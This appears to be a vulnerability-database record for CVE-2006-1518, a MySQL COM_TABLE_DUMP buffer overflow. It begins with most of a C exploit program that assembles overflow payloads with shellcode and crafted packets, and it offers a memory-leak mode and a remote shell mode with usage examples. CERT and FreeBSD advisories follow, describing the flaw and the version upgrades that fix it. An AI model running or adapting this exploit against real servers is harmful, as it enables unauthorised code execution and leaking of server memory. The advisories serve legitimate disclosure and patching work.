0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d\t// 176\n , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75\t// 192 178\n , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 208\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 224\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 240\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 256\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 272\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t// 288\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d\t//\n , 0x3d, 0x3d, 0x27\n};\t\t\t\t// 16*23+3 = 371\n\n\n\n\nstatic int s = 0, c = 0;\nint fd = 0;\nint d = 1;\nint hexdump = 0;\nchar buf[65535];\n\n\nMYSQL *conn;\t\t\t/* pointer to connection handler */\n\n\nint\nsendit (char *buf1, int fdest, int dblen)\n{\n int len1;\n int i = 0;\n int ret = 0;\n printf (\"%d\\n\", d);\n if (d == 2)\n {\n // let's prepare the query packet \n int o;\n int position = 14;\n\n tmp_idx = 3;\n\n\n int ret = tbl - 0x106 + 33;\n\n for (i = 0; i < 32; i += 8)\n\taddr_ret[tmp_idx--] = (ret >> i) & 0xff;\n\n tmp_idx = 3;\n for (i = 0; i < 32; i += 8)\n\taddr_tdh[tmp_idx--] = (thd >> i) & 0xff;\n\n tmp_idx = 3;\n for (i = 0; i < 32; i += 8)\n\taddr_tbl[tmp_idx--] = (tbl >> i) & 0xff;\n printf (\"ret %x\\n\", ret);\n\n\n#if 1\n tmp_idx = 0;\n for 
(o = THD_POS; o > THD_POS - 4; o--)\n\tquery_payload[o] = addr_tdh[tmp_idx++];\n\n tmp_idx = 0;\n for (o = TBL_POS; o > TBL_POS - 4; o--)\n\tquery_payload[o] = addr_tbl[tmp_idx++];\n\n tmp_idx = 0;\n for (o = RET_POS; o > RET_POS - 4; o--)\n\tquery_payload[o] = addr_ret[tmp_idx++];\n#else\n for (; position < payload_len - 12; position += 12)\n\t{\n\t tmp_idx = 0;\n\t printf (\"p:%d\\n\", position);\n\t for (o = position + 4; o > position; o--)\n\t query_payload[o] = addr_ret[tmp_idx++];\n\n\t tmp_idx = 0;\n\t for (o = position + 8; o > position + 4; o--)\n\t query_payload[o] = addr_tdh[tmp_idx++];\n\n\t tmp_idx = 0;\n\t for (o = position + 12; o > position + 8; o--)\n\t query_payload[o] = addr_tbl[tmp_idx++];\n\n\t}\n\n#endif\n\n tmp_idx = 0;\n for (o = SHL_POS; o < SHL_POS + 84; o++)\n\tquery_payload[o] = shcode[tmp_idx++];\n\n printf (\"entro\\n\");\n buf1 = query_payload;\n len1 = payload_len;\n }\n else if (d >= 3)\n {\n printf (\"entro\\n\");\n\n // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73)\n buf1 = table_dump_packet;\n if (dblen >= 0)\n\tbuf1[5] = (char) dblen;\n printf (\"%x\", (char) dblen);\n len1 = dump_packet_len;\n }\n d++;\n\n printf (\"\\nClient -> Server\\n\");\n if (hexdump)\n {\n for (i = 0; i < len1; i++)\n\tprintf (\" %.2x%c\", (unsigned char) buf1[i],\n\t\t((i + 1) % 16 ? ' ' : '\\n'));\n printf (\"\\n\");\n for (i = 0; i < len1; i++)\n\t{\n\t unsigned char f = (unsigned char) buf1[i];\n\t printf (\" %.2c%2c\", (isprint (f) ? f : '.'),\n\t\t (((i + 1) % 16) ? ' ' : '\\n'));\n\t}\n }\n if (send (fd, buf1, len1, 0) != len1)\n {\n perror (\"cli: send(buf3)\");\n exit (1);\n }\n\n\n\n fdest = fd;\n\n memset (buf, 0, 65535);\n ret = recv (fdest, buf, 65535, 0);\n printf (\"\\nServer -> Client\\n\");\n if (hexdump)\n {\n for (i = 0; i < ret; i++)\n\tprintf (\" %.2x%c\", (unsigned char) buf[i],\n\t\t((i + 1) % 16 ? 
' ' : '\\n'));\n printf (\"\\n\");\n for (i = 0; i < ret; i++)\n\t{\n\t unsigned char f = (unsigned char) buf[i];\n\t printf (\" %.2c%2c\", (isprint (f) ? f : '.'),\n\t\t ((i + 1) % 16 ? ' ' : '\\n'));\n\t}\n }\n else\n {\n printf (\"\\n%s\\n\", buf + 5);\n }\n// printf(\"\\nSending to client\\n\");\n// ret= send(c, buf, ret, 0);\n\n return 0;\n}\n\nusage ()\n{\n printf\n (\"\\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\\n\\n\\\n-H: this Help;\\n\\\n-i: Information leak exploit (shows the content of MySql Server Memory)\\n\\\n-x: shows c/s communication output in hexadecimal\\n\\\n-t: hexadecimal table_list struct address (by default we try to find it automatically)\\n\\\n-a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\\n\\\n-u: mysql username (anonymous too ;)\\n\\\n-p: mysql userpass (if you need it)\\n\\\n-s: the socket path if is a unix socket\\n\\\n-h: hostname or IP address\\n\\\n-P: port (default 3306)\\n\\n\\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\\n\\n\\\nExample_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\\n\\n\\\n \");\n\n}\n\nint\nmain (int argc, char *argv[])\n{\n\n int fdest = 0;\n int port = 3306;\n int shell = 1;\n int force_table = 0;\n char buf1[65535];\n char *socket;\n char *user = NULL;\n char *pass = NULL;\n char *host = NULL;\n socket = strdup (\"/tmp/mysql2.sock\");\n opterr = 0;\n\n while ((c = getopt (argc, argv, \"s:t:a:P:Hh:u:p:ix\")) != -1)\n switch (c)\n {\n case 's':\n\tsocket = (char *) optarg;\n\tbreak;\n case 't':\n\tforce_table = 1;\n\ttbl = (int) strtol (optarg, NULL, 16);\n\t//tbl=atoi( optarg );\n\tbreak;\n case 'a':\n\tthd = (int) strtol (optarg, NULL, 16);\n\tbreak;\n case 'u':\n\tuser = (char *) optarg;\n\tbreak;\n case 'p':\n\tpass = (char *) optarg;\n\tbreak;\n case 'P':\n\tport = atoi (optarg);\n\tbreak;\n case 'h':\n\thost = (char *) 
optarg;\n\tbreak;\n case 'i':\n\tshell = 0;\n\tbreak;\n case 'x':\n\thexdump = 1;\n\tbreak;\n case 'H':\n\tusage ();\n\treturn 1;\n default:\n\tbreak;\n }\n\n if (!force_table)\n tbl = thd + 0x1f548;\n conn = mysql_init (NULL);\n int ret = mysql_real_connect (conn,\t/* pointer to connection handler */\n\t\t\t\thost,\t/* host to connect to */\n\t\t\t\tuser,\t/* user name */\n\t\t\t\tpass,\t/* password */\n\t\t\t\tNULL,\t/* database to use */\n\t\t\t\t0,\t/* port (use default) */\n\t\t\t\tsocket,\t/* socket (use default) */\n\t\t\t\t0);\t/* flags (none) */\n\n if (!ret)\n {\n fprintf (stderr, \"Can't connect, error : %s\\n\", mysql_error (conn));\n return 1;\n }\n printf (\"using table_list:%x thread:%x\\n\", tbl, thd);\n\n fd = conn->net.fd;\n\n if (shell)\n {\n d = 2;\n sendit (buf1, fdest, -1);\n d = 3;\n sendit (buf1, fdest, -1);\n d = 3;\n sendit (buf1, fdest, -1);\n }\n else\n {\n int l;\n d = 3;\n for (l = 0; l < 256; l++)\n\t{\n\t sendit (buf1, fdest, l);\n\t}\n }\n mysql_close (conn);\n\n exit (0);\n}\n\n// milw0rm.com [2006-05-02]\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1741/"}], "cert": [{"lastseen": "2020-09-18T20:43:06", "bulletinFamily": "info", "cvelist": ["CVE-2006-1518"], "description": "### Overview \n\nMySQL contains a buffer overflow that may allow a remote, authenticated attacker to execute arbitrary code on a vulnerable server.\n\n### Description \n\n**MySQL and COM_TABLE_DUMP**\n\n[MySQL](<http://www.mysql.com/>) is an open-source database system available for Microsoft Windows, Linux, and other UNIX-based operating systems. Command packets are sent to the MySQL server to issue instructions to that server. 
One such command packet type is COM_TABLE_DUMP, which the [MySQL Internals Manual](<http://downloads.mysql.com/docs/internals-en.pdf>) describes as: \n \n_COM_TABLE_DUMP (used by slave server to get master table)_ \n**The Problem** \n \nMySQL fails to properly validate user-controlled parameters within COM_TABLE_DUMP packets. If an attacker sends a series of specially crafted COM_TABLE_DUMP packets to a vulnerable MySQL server, that attacker may be able to cause a buffer overflow. \n \n**Considerations** \n \nSome level of authentication is needed to exploit this vulnerability. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nA remote, authenticated attacker may be able to execute arbitrary code on a MySQL server. \n \n--- \n \n### Solution \n\n**Upgrade** \nThis issue is corrected in MySQL versions [4.0.27](<http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html>), [4.1.19](<http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html>), [5.0.21](<http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html>), and [5.1.10](<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html>). Refer to the MySQL [downloads](<http://dev.mysql.com/downloads/>) page to get the appropriate updated version. \n \n--- \n \n \n**Disable anonymous access to MySQL** \n \nAlthough disabling anonymous access to MySQL does not prevent attacks from occurring, it does prevent unauthenticated users from attempting to exploit the vulnerability. \n \n--- \n \n### Vendor Information\n\n602457\n\n### MySQL AB: Affected\n\nUpdated: May 05, 2006 
\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to the security fixes sections of:\n\n<http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html> \n<http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html> \n<http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html> \n<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23602457 Feedback>).\n\n### Red Hat, Inc.: Not Affected\n\nUpdated: May 17, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThis issue only affected version 5 of MySQL. All Red Hat Enterprise Linux releases shipped with MySQL versions prior to 5 and are not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### References \n\n * <http://secunia.com/advisories/19929/>\n * <http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html>\n * <http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html>\n * <http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html>\n * <http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html>\n * <http://downloads.mysql.com/docs/internals-en.pdf>\n\n### Acknowledgements\n\nThis vulnerability was reported by Stefano Di Paola.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-1518](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-1518>) \n---|--- \n**Severity Metric:** | 12.33 \n**Date Public:** | 2006-05-02 \n**Date First 
Published:** | 2006-05-05 \n**Date Last Updated:** | 2006-05-17 12:24 UTC \n**Document Revision:** | 40 \n", "modified": "2006-05-17T12:24:00", "published": "2006-05-05T00:00:00", "id": "VU:602457", "href": "https://www.kb.cert.org/vuls/id/602457", "type": "cert", "title": "MySQL fails to properly validate COM_TABLE_DUMP packets", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:44", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1518"], "description": "\nStefano Di Paola reports:\n\nAn authenticated user could remotely execute arbitrary\n\t commands by taking advantage of a stack overflow.\nTo take advantage of these flaws an attacker should have\n\t direct access to MySQL server communication layer (port\n\t 3306 or unix socket). But if used in conjunction with some\n\t web application flaws (i.e. php code injection) an\n\t attacker could use socket programming (i.e. php sockets)\n\t to gain access to that layer.\n\n", "edition": 4, "modified": "2006-05-02T00:00:00", "published": "2006-05-02T00:00:00", "id": "A8D8713E-DC83-11DA-A22B-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html", "title": "mysql50-server -- COM_TABLE_DUMP arbitrary code execution", "type": "freebsd", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}